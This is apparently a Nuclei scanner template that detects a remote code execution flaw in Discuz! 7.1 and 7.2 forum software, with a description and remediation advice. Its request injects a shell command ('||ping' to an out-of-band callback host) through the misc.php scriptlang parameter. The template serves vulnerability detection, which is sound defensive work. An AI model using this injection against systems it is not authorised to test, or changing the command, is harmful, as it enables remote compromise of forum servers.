id: discuz-rce-misc
info:
  name: Discuz 7.1&7.2 remote code execution vulnerability
  author:
  - 折跃
  description: |-
    Discuz! 7.1&7.2 remote code execution vulnerability.
    Discuz! is a generic community forum software system.

    Discuz! 7.1&7.2 has a code execution vulnerability. An attacker can exploit it to execute system commands.
  severity: critical
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. When executing functions that can evaluate strings as code, strictly validate the parameters passed by the user, and avoid letting users control parameters when possible.
    2. Validate request content, filter malicious code and various bypass techniques such as case variations and BASE64 encoding, and restrict submissions.
requests:
- matchers:
  - type: word
    part: interactsh_protocol
    words:
    - dns
  path:
  - '{{BaseURL}}/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]||ping%20-c%203%20{{interactsh-url}}'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
variables:
  verify: '{{rand_text_alphanumeric(32,"")}}'
